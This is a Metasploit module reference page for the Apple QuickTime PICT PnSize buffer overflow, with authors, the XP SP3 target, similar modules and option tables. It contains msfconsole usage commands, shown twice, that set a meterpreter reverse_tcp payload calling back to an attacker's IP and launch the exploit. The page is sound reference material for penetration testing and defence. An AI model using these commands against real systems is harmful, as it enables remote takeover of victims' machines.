Apple QuickTime PICT PnSize Buffer Overflow
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.
Exploit Rank
- Good
Exploit Authors
- MC < mc [at] metasploit.com >
- corelanc0d3r < peter.ve [at] corelan.be >
Vulnerability References
Exploit Targets
- 0 - Windows XP SP3 with DEP bypass (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/apple_quicktime_pnsize
msf exploit(apple_quicktime_pnsize) > show payloads
msf exploit(apple_quicktime_pnsize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_pnsize) > set LHOST [MY IP ADDRESS]
msf exploit(apple_quicktime_pnsize) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/apple_quicktime_pnsize
msf exploit(apple_quicktime_pnsize) > show payloads
msf exploit(apple_quicktime_pnsize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_pnsize) > set LHOST [MY IP ADDRESS]
msf exploit(apple_quicktime_pnsize) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.mov) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
